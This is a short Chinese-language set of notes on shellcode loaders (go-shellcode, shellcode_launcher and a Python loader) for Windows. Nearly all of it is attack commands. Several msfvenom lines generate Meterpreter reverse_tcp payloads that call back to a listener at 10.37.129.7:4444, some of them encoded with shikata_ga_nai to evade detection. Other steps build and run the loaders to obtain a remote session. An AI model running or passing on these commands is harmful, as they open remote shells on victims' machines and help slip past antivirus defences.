go-shellcode加载器
下载后,进入go-shellcode\cmd\sc目录,执行go build
生成sc.exe
然后用msfvenom生成hex格式的shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.37.129.7 LPORT=4444 -f hex -o shell.hex
使用sc加载器进行加载
sc.exe shellcode
运行可得到session
shellcode_launcher 加载器
下载到本地。
使用msfvenom生成raw格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.37.129.7 lport=4444 -f raw -o shellcode.raw
测试机器上执行
shellcode_launcher.vmp.exe -i shellcode.raw
msf可上线。
python加载器
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.37.129.7 lport=4444 -f c -o shell.c